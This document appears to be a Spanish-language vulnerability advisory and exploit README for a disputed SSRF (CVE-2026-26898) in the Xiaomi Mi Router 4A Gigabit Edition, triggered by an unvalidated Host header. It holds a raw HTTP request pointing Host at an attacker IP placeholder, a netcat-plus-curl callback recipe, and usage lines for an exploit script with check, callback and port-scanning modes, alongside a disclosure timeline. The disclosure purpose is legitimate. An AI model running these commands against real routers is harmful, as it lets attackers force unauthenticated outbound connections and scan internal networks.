
SSRF no autenticado en Xiaomi Mi Router 4A Gigabit Edition (firmware 3.0.24) mediante inyección de encabezado Host — CVE-2026-26898
Existe una vulnerabilidad de Server-Side Request Forgery (SSRF) en la edición Gigabit del Xiaomi Mi Router 4A. La interfaz web del router no valida la cabecera HTTP Host, lo que permite a un atacante no autenticado forzar al router a realizar conexiones TCP salientes arbitrarias.
| Campo | Valor |
|---|
| Dispositivo | Xiaomi Mi Router 4A Gigabit Edition |
| Firmware | 3.0.24 (Internacional) |
| CVE | CVE-2026-26898 (disputado — ver Estado de divulgación más abajo) |
| CWE | CWE-918 (Server-Side Request Forgery) |
| CVSS 3.1 | 8.6 (Alto) — evaluado por el investigador; el proveedor disputa la gravedad |
Estado: Disputado por el proveedor — este informe no fue aceptado por Xiaomi.
CVE-2026-26898 se utiliza aquí solo con fines de seguimiento; dado el conflicto con el proveedor, debe tratarse como disputado / no confirmado, no como confirmado por el proveedor.
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444
# Terminal 1: Start listener
nc -l 4444
# Terminal 2: Send malicious request
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"
| Archivo | Descripción |
|---|---|
xiaomi_ssrf_exploit.py | Exploit completo con múltiples modos |
# Check if vulnerable
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check
# Callback mode
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444
# Port scanner
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443
| Fecha | Evento |
|---|---|
| 2026-01-15 | Vulnerabilidad descubierta; PoC desarrollado |
| 2026-01-16 | Informada a Xiaomi a través de HackerOne (#3513458) |
| 2026-01-23 | Xiaomi cerró el informe como Informative (bajo riesgo, no lo corregirá) |
| 2026-06-03 | Aviso público publicado (este repositorio) — disputado por el proveedor, sin parchear |
Este exploit se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal.
Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace